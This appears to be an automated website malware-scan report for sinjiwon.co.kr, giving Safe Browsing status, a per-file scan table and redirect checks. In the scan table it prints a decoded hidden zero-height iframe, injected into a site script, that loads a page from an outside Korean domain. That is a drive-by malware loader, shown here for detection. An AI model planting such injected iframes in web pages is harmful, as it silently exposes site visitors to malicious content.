Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sinjiwon.co.kr
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sinjiwon.co.kr/ | 200 OK Content-Length: 43195 Content-Type: text/html | clean |
http://sinjiwon.co.kr/JS/active.js | 200 OK Content-Length: 17081 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JS.js | 200 OK Content-Length: 5471 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function new_win(filename,p_name,s_width,s_height,s_scrol){
var x = screen.width; var y = screen.height; var wid = (x / 2) - (s_width / 2); var hei = (y / 2) - (s_height / 2); window.open(filename, p_name, "toolbar=0,location=0,directories=0,status=0,menubar=0,resizable=0,scrollbars=" + s_scrol + ",width=" + s_width + ",height=" + s_height + ",top=" + hei + ",left=" + wid + ",scrolbar=no"); } function check_email(str){ emailStr = str.valu check_num.focus(); return false } } } function IsNotNullCheck (obj, msg, setFocus) { if (setFocus == null || setFocus == undefined) { setFocus = true; } if ( ( obj.value == "" ) || ( obj.value.indexOf(" ") == 0 ) ) { alert ( msg ); if (setFocus) { obj.focus(); } return true; } return false; } Decoded script: <iframe src=http://gangpan.co.kr/data/index.html width=100 height=0></iframe> Antivirus reports:
| ||
http://sinjiwon.co.kr/JS/JQuery.js | 200 OK Content-Length: 154668 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JQuery_Carousel.js | 200 OK Content-Length: 14310 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JQuery_Easing.js | 200 OK Content-Length: 8301 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/JS/JQuery_MouseWheel.js | 200 OK Content-Length: 2485 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/index.asp | 200 OK Content-Length: 54471 Content-Type: text/html | clean |
http://wcs.naver.net/wcslog.js | 200 OK Content-Length: 16780 Content-Type: application/javascript | clean |
http://sinjiwon.co.kr/js/LayerPopup.js | 200 OK Content-Length: 9743 Content-Type: application/x-javascript | clean |
http://sinjiwon.co.kr/member/login.asp | 200 OK Content-Length: 24564 Content-Type: text/html | clean |
http://sinjiwon.co.kr/member/mem_default.asp | 200 OK Content-Length: 20821 Content-Type: text/html | clean |
http://sinjiwon.co.kr/mypage/mycart.asp | 200 OK Content-Length: 15683 Content-Type: text/html | clean |
http://sinjiwon.co.kr/mypage/order_view.asp | 200 OK Content-Length: 158 Content-Type: text/html | clean |
http://sinjiwon.co.kr/test404page.js | 404 Not Found Content-Length: 1466 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sinjiwon.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 27 Aug 2014 12:32:26 GMT
Server: Microsoft-IIS/6.0
Content-Length: 54471
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDQSBRB=EIIEPFCCPFAJDNIOMGHKJIBE; path=/
X-Died: timeout at scan.pm line 1546.
X-Powered-By: ASP.NET
...54471 bytes of data.
GET / HTTP/1.1
Host: sinjiwon.co.kr
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 27 Aug 2014 12:32:26 GMT
Server: Microsoft-IIS/6.0
Content-Length: 54471
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDQSBRB=EIIEPFCCPFAJDNIOMGHKJIBE; path=/
X-Died: timeout at scan.pm line 1546.
X-Powered-By: ASP.NET
...54471 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sinjiwon.co.kr
Referer: http://www.google.com/search?q=sinjiwon.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sinjiwon.co.kr
Referer: http://www.google.com/search?q=sinjiwon.co.kr
Result:
The result is similar to the first query. There are no suspicious redirects found.